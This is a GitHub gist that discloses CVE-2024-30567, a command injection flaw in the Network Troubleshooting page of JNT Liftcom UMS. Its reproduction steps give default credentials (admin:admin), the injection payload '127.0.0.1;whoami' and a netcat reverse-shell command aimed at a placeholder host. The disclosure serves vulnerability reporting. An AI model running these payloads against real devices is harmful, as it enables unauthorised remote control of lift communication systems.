Skip to content

Instantly share code, notes, and snippets.

@s4fv4n
Created April 11, 2024 19:03
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save s4fv4n/f0e8eccd0ce4bd1ac109fa2481c90ee6 to your computer and use it in GitHub Desktop.
Save s4fv4n/f0e8eccd0ce4bd1ac109fa2481c90ee6 to your computer and use it in GitHub Desktop.
CVE ID: CVE-2024-30567
Vulnerability Title: Authenticated Arbitrary Remote Code Execution on JNT Liftcom UMS v1.J Core Version JM-V15
Description:
An issue in JNT Telecom JNT Liftcom UMS v.1 Jcore v.JM15 allows a remote attacker to execute arbitrary code via the Network Troubleshooting functionality.
VulnerabilityType:
Remote Code Execution
Vendor of Product:
JNT Telecom (JNT)
Affected Product Code Base:
JNT Liftcom UMS - UMS V1.J Core Version JM-V15
Affected Component:
The vulnerability is on the "Network Troubleshooting" functionality on the JNT Liftcom UMS web interface.
Attack Type:
Remote
Impact Code execution:
true
Impact Information Disclosure:
true
Attack Vectors:
Steps to Reproduce:
Step 1 : Open the JNT Liftcom UMS web interface
Step 2: Authenticate with the credentials. (Default credentials admin:admin)
Step3 : Navigate to the Network Troubleshooting option.
Step 4: In the "Network Troubleshooting" page, there is an input field where we can enter an IP address to check if it is accessible or not. In that input filed enter the payload "127.0.0.1;whoami"
Step 5: In the response we can the see the result of the command "whoami". Which means we were able to successfully execute arbitrary code on the remote system.
Step 6: Since the backend operating system is running linux, we can easily get a reverse shell using "nc <ip address> <port> -e /bin/sh" (or we can use any other payloads)
Step 7: Start a listener on the port used in the payload.
Step 8: We will get a reverse shell.
Reference:
https://jnt-telecom.com/
https://jnt.se
Discoverer:
Safvan Parakkal
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment